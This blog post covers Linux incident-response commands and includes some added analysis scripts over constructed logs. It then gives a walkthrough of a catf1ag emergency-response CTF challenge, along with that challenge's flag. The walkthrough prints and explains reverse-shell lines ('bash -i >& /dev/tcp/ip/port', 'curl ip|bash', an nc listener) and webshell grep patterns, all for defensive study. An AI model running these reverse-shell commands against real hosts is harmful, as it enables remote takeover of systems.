Preface
Recently I read more than half of the Practical Guide to Network Security Emergency Response Technology (Qianxin), and I happened to come across the emergency-response PWN challenge on the catf1ag platform. This post records how I solved it and summarizes emergency response operations on Linux systems.
1, Basic emergency response skills on Linux systems
1. System troubleshooting
(1) Basic system information
lscpu                 View CPU information, including model, clock frequency and core count
uname -a              View information about the running operating system
cat /proc/version     View the operating system version
lsmod                 View all modules loaded into the kernel
(2) User information
cat /etc/passwd       View user information. Each line is colon-separated into: user name, encrypted password, user ID, user group ID, comment, user home directory, default login shell. A shell of /bin/bash means the account can log in; /sbin/nologin means it cannot.
awk -F: '{if($3==0)print $1}' /etc/passwd        List superuser accounts (UID 0)
awk -F: 'length($2)==0 {print $1}' /etc/shadow    List accounts with an empty password
lastb                 List failed login attempts
lastlog               Last login information for every user on the system
last                  Recent login information for users (from /var/log/wtmp, btmp, utmp): wtmp stores successful logins, btmp stores failed logins, utmp stores current sessions
(3) Startup items
cat /etc/init.d/rc.local    View the contents of rc.local in the init.d folder
cat /etc/rc.local           View the contents of rc.local
ls -alt /etc/init.d         List details of all files in the init.d folder
(4) Scheduled tasks
Scheduled tasks are usually located in files under /etc/cron*.
crontab -l                  Scheduled tasks of the current user
crontab -u username -l      View a given user's scheduled tasks
ls /etc/cron*               All scheduled-task files in the etc directory
The following files and folders usually contain tasks:
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/*
/etc/anacrontab
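The account checks above (UID 0 accounts, empty passwords, login-capable shells) and the cron locations, written as shell functions. This is an added example and not code from the original post: the passwd and shadow contents, the account names and the hashes are constructed so the script runs offline; on a real host point the functions at /etc/passwd and /etc/shadow. The new_accounts function compares a current passwd file against a baseline copy, which is what the later "find the new abnormal user" step amounts to.

```shell
#!/bin/sh
# Added example (not from the original post): the account checks above as
# functions over passwd- and shadow-format files. All sample accounts and
# hashes are made up; on a real host use /etc/passwd and /etc/shadow.

WORK=$(mktemp -d)

# Constructed passwd file: 'toor' is a second UID-0 account, 'backup2' keeps
# a login shell where a service account would normally have nologin.
cat > "$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
toor:x:0:0::/root:/bin/bash
backup2:x:1001:1001::/var/backups:/bin/sh
EOF

# Constructed shadow file: 'backup2' has an empty password field.
cat > "$WORK/shadow" <<'EOF'
root:$6$saltsalt$madeuphash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$6$saltsalt$madeuphash:19000:0:99999:7:::
toor:$6$saltsalt$madeuphash:19000:0:99999:7:::
backup2::19000:0:99999:7:::
EOF

# Constructed baseline: the passwd file as it looked before the incident.
head -n 3 "$WORK/passwd" > "$WORK/passwd.baseline"

# Accounts with UID 0, the same test as awk -F: '{if($3==0)print $1}'.
uid0_users() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# Accounts whose shadow entry has an empty password hash.
empty_password_users() {
    awk -F: 'length($2) == 0 { print $1 }' "$1"
}

# Accounts whose login shell is not nologin/false, i.e. that can log in.
login_capable_users() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# Accounts present in the current passwd file but not in the baseline copy:
# this is how a newly added abnormal user stands out. Args: baseline current.
new_accounts() {
    awk -F: 'NR == FNR { seen[$1] = 1; next } !($1 in seen) { print $1 }' "$1" "$2"
}

# The cron locations listed above; print the ones that exist on this host.
existing_cron_sources() {
    for p in /etc/crontab /etc/cron.d /etc/cron.daily /etc/cron.hourly \
             /etc/cron.monthly /etc/cron.weekly /etc/anacrontab; do
        [ -e "$p" ] && echo "$p"
    done
    return 0
}

echo "UID 0 accounts:";       uid0_users "$WORK/passwd"
echo "Empty passwords:";      empty_password_users "$WORK/shadow"
echo "Login-capable:";        login_capable_users "$WORK/passwd"
echo "New since baseline:";   new_accounts "$WORK/passwd.baseline" "$WORK/passwd"
echo "Cron sources present:"; existing_cron_sources
```

The baseline comparison only works if a trusted copy of /etc/passwd exists (from a backup, an image, or configuration management); without one, fall back to reviewing UID 0 and login-capable accounts by hand as the text describes.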
2. Process troubleshooting
(1) Service troubleshooting
netstat                     Analyze suspicious ports and IPs, for example netstat -antlp, netstat -ano
ls -alt /proc/PID           View the program corresponding to a process ID
lsof -p PID                 View the files opened by a process
kill -9 PID                 Kill the process with the given ID
rm -rf filename             Delete a file; if even root cannot delete it, the file has the i (immutable) attribute set
lsattr filename             View file attributes
chattr -i filename          Remove the i attribute from a file
ps -ef | awk '{print $2}' | sort -n | uniq > 1, ls /proc | sort -n | uniq > 2, diff 1 2     Find hidden processes by comparing the PIDs ps reports with the entries in /proc
chkconfig --list            View the services on the system; 0-6 are runlevels: single user, multi-user command line without network, multi-user command line with network, unused, multi-user with graphical interface, reboot
top                         View processes with high resource usage
ps                          View process information, for example ps -ef
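The two process checks above, the ps-versus-/proc comparison and the review of suspicious connections, written as functions over constructed input. This is an added example, not code from the original post: the PID lists and the netstat -antlp lines are made up (the IPs are documentation addresses), and the process named 1337/bash is the planted symptom the functions should surface.

```shell
#!/bin/sh
# Added example (not from the original post): hidden-PID comparison and
# suspicious-connection review over constructed ps, /proc and netstat output.
# On a live host replace the sample files with:
#   ps -e -o pid= | sort -n > ps_pids;  ls /proc | grep '^[0-9]' | sort -n > proc_pids
#   netstat -antlp > netstat_out

WORK=$(mktemp -d)

# Constructed: PIDs that ps reported.
printf '%s\n' 1 2 532 1187 2044 > "$WORK/ps_pids"
# Constructed: PIDs that /proc listed; 1337 is in /proc but missing from ps.
printf '%s\n' 1 2 532 1187 1337 2044 > "$WORK/proc_pids"

# Constructed netstat -antlp output: sshd and mysqld listening, plus a bash
# process holding an outbound connection to port 4444, a reverse-shell symptom.
cat > "$WORK/netstat_out" <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      612/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      890/mysqld
tcp        0      0 10.0.0.5:52344          203.0.113.9:4444        ESTABLISHED 1337/bash
tcp        0      0 10.0.0.5:22             10.0.0.20:50122         ESTABLISHED 2044/sshd
EOF

# PIDs present in the /proc listing but absent from ps output. A process that
# ps cannot see is the classic hooked-ps / rootkit symptom. Same result as the
# diff-based check above, but independent of line order. Args: ps_list proc_list.
hidden_pids() {
    awk 'NR == FNR { seen[$1] = 1; next } !($1 in seen) { print $1 }' "$1" "$2"
}

# Established TCP connections owned by a shell (sh, bash, dash, zsh). A shell
# normally holds no socket, so each hit is a candidate reverse shell to inspect
# with ls -alt /proc/PID and lsof -p PID.
shell_connections() {
    awk '$1 ~ /^tcp/ && $6 == "ESTABLISHED" && $7 ~ /\/(ba|da|z)?sh$/ { print $5, $7 }' "$1"
}

# Listening sockets with the owning program, for a quick port review.
listening_ports() {
    awk '$1 ~ /^tcp/ && $6 == "LISTEN" { print $4, $7 }' "$1"
}

echo "Hidden PIDs:";        hidden_pids "$WORK/ps_pids" "$WORK/proc_pids"
echo "Shell connections:";  shell_connections "$WORK/netstat_out"
echo "Listening:";          listening_ports "$WORK/netstat_out"
```

The netstat column positions ($4 local, $5 foreign, $6 state, $7 PID/program) are those of netstat -antlp; ss -antp lays the columns out differently, so adjust the field numbers if that tool is used instead.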
(2) File trace troubleshooting
Common sensitive directories on Linux are /tmp and the command directories /usr/bin and /usr/sbin, which are often used as download locations for malware or have their binaries replaced.
find                  Search within the specified directory
  -type b/d/c/p/l/f   Find block devices, directories, character devices, pipes, symbolic links, regular files
  -mtime -n / +n      Find files by modification time: -n means within n days, +n means more than n days ago
  -atime -n / +n      Find files by access time
  -ctime -n / +n      Find files by creation time
stat                  View a file's creation, modification and access times
chkrootkit            Check whether a rootkit backdoor is present; an INFECTED result means a backdoor was detected
Examples:
find / -atime 5 -name "*.php"      Find .php files accessed within five days
find / -ctime 5 -name "*.sh"       Find .sh files created within five days
find /directory -perm 777          Find files with permission 777
stat test.php                      View details of test.php
find / -name "*.php" | xargs egrep "assert|eval|exec|shell_exec|POST"     Find php files whose content contains assert, eval and similar
ls -alt /bin          View the modification times of system commands in the command directory
ls -alh /bin          Check the sizes of the relevant files to determine whether they have been replaced
(3) Log analysis
/var/log/wtmp                 Records logins, logouts, data exchange, shutdown and reboot
/var/log/cron                 Records logs related to scheduled tasks
/var/log/messages             Records information and error logs after system startup
/var/log/apache2/access.log   Apache access log
/var/log/auth.log             Records system authorization information
/var/log/secure               Records the account and password entered by most applications and whether login succeeded
/var/log/faillog              Records failed login information
cat /var/log/secure | awk '/Accepted/{print $(NF-3)}' | sort | uniq -c | awk '{print $2"="$1;}'     (CentOS) Count logins per IP address, to locate which IPs brute-forced root
grep "Accepted" /var/log/secure | awk '{print $1,$2,$3,$9,$11}'     View the date, user name and IP address of successful logins
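The /var/log/secure queries above as shell functions, extended with the failed-login view (which is where brute forcing actually shows) and a combined check for source IPs that failed repeatedly and then succeeded. This is an added example, not code from the original post: the sshd log lines are constructed, the IPs are documentation addresses, and 198.51.100.7 is the made-up brute-forcer. On CentOS the real input is /var/log/secure; on Debian/Ubuntu it is /var/log/auth.log.

```shell
#!/bin/sh
# Added example (not from the original post): /var/log/secure analysis over
# constructed sshd entries. $(NF-3) is the source IP on both "Accepted" and
# "Failed password" lines, with or without "invalid user", because every such
# line ends "from IP port N ssh2".

WORK=$(mktemp -d)

# Constructed log lines in /var/log/secure format.
cat > "$WORK/secure" <<'EOF'
Mar  3 10:21:07 web01 sshd[2211]: Accepted password for root from 203.0.113.9 port 51234 ssh2
Mar  3 10:21:09 web01 sshd[2215]: Failed password for root from 198.51.100.7 port 40110 ssh2
Mar  3 10:21:11 web01 sshd[2215]: Failed password for root from 198.51.100.7 port 40111 ssh2
Mar  3 10:25:40 web01 sshd[2301]: Accepted publickey for alice from 10.0.0.20 port 52000 ssh2
Mar  3 10:26:02 web01 sshd[2310]: Failed password for invalid user admin from 198.51.100.7 port 40200 ssh2
Mar  3 10:26:30 web01 sshd[2320]: Accepted password for root from 198.51.100.7 port 40201 ssh2
Mar  3 10:30:15 web01 sshd[2350]: Accepted password for root from 203.0.113.9 port 51300 ssh2
EOF

# Successful logins per source IP (the first command above, in one awk pass).
accepted_by_ip() {
    awk '/Accepted/ { c[$(NF-3)]++ } END { for (ip in c) print ip "=" c[ip] }' "$1" | sort
}

# Failed logins per source IP: the view that shows brute forcing directly.
failed_by_ip() {
    awk '/Failed password/ { c[$(NF-3)]++ } END { for (ip in c) print ip "=" c[ip] }' "$1" | sort
}

# Date, user name and source IP of each successful login (second command above).
successful_logins() {
    awk '/Accepted/ { print $1, $2, $3, $9, $11 }' "$1"
}

# Source IPs with at least N failures that later also succeeded: brute force
# that worked, i.e. the remote-login IP an investigator is after. Args: file N.
failed_then_accepted() {
    awk -v min="$2" '
        /Failed password/ { f[$(NF-3)]++ }
        /Accepted/        { a[$(NF-3)]++ }
        END { for (ip in a) if (f[ip] >= min) print ip }' "$1" | sort
}

echo "Accepted per IP:";   accepted_by_ip "$WORK/secure"
echo "Failed per IP:";     failed_by_ip "$WORK/secure"
echo "Successful logins:"; successful_logins "$WORK/secure"
echo "Brute force that succeeded (>= 2 failures):"; failed_then_accepted "$WORK/secure" 2
```

Logs on a compromised host may have been truncated or edited, so treat an empty result as "nothing recorded", not "nothing happened", and compare with wtmp/btmp (last, lastb) and any remote syslog copy.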
(4) Traffic analysis
Use Wireshark flexibly.
2, Detailed explanation of the catf1ag AK PWN challenge
Challenge description:
One day the catf1ag platform received a remote-login notification email. After checking with internal colleagues it turned out that none of them had logged in, so admin logged in to the server and found that it had been compromised and implanted with a scheduled reverse-shell file and a backdoor file. Please log in to the server to simulate the investigation: find the reverse-shell file, find the remote login IP, find the connection password of the PHP backdoor file, and find the newly added abnormal user.
The challenge prompt is clear: the server was backdoored through a PHP shell. Typically the PHP reverse shell operation is
bash -i >& /dev/tcp/ip/port 0>&1
or
bash -c "bash -i >& /dev/tcp/ip/port 0>&1"    # bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1
Full interpretation:
bash -i    starts an interactive bash shell
>&         merges standard output and standard error, then redirects both together to what follows.
/dev/tcp/ip/port    makes the target host establish a TCP connection to the attacker's IP and port.
0>&1       ties standard input to standard output, so input is read from the same place output is written.
Taken together: bash starts an interactive environment, its output (stdout and stderr combined) is redirected into the TCP session the local host opened to the attacker's port, and its standard input is bound to that same session, so the attacker's keyboard input reaches bash and bash's output goes back over the connection. That is the reverse shell.
On the attacker side:
nc -lvvp port
curl ip|bash
Log in to the server with the ssh command.
First use the find command to locate the PHP backdoor: find / -name "*.php" | xargs egrep "eval|POST"
Then use find again for files with the .sh suffix: find / -name "*.sh" | xargs egrep "bash|dev|tcp"
Use cat /etc/passwd to review user information and find the hacker_v user.
The final flag is catf1ag{1.15.155.181-she11.sh-cat_f1ag_666-hacker_v}
Summary
Emergency response requires capabilities in data collection, storage and retrieval, event discovery, event analysis, event research and judgment, event handling, and attack tracing. I will write another post for the Windows system case.